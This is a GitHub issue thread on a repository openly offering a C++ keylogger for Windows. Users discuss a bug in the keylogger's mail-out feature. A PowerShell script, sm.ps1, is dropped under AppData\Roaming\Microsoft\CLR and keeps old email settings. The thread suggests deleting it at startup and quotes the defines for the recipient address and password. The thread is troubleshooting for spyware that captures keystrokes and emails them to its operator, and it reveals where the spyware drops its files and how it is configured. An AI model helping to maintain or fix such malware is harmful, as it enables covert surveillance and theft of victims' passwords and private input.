Siegfried5 / Keylogger

Keylogger Code In C++ Will Work On Window 7, 8, 8.1, And 10
Apache License 2.0
77 stars 31 forks source link

You program need delete the script sm.ps1 when the program start #1

Open merlinnusr opened 6 years ago

merlinnusr commented 6 years ago

If you change the parameters MAIL X_EM_TO, X_EM_FROM, X_EM_PASS the next compilation ignore all parameters and only take sm.ps1 to send all mails

\AppData\Roaming\Microsoft\CLR\sm.ps1 in this route

P.D Broken english srry -

Siegfried5 commented 6 years ago

When you say you change the parameters, Do you mean these line of code?

define X_EM_TO "ENTER YOUR EMAIL ADDRESS"

#define X_EM_FROM "ENTER YOUR EMAIL ADDRESS"
#define X_EM_PASS "ENTER YOUR PASSWORD"
merlinnusr commented 6 years ago

I mean you have to destroy the file(sm.ps1) when the program is recompiled

To ensure that the program uses the parameters of the email and password

merlinnusr commented 6 years ago

like a remove(\AppData\Roaming\Microsoft\CLR\sm.ps1) at the beginning of the main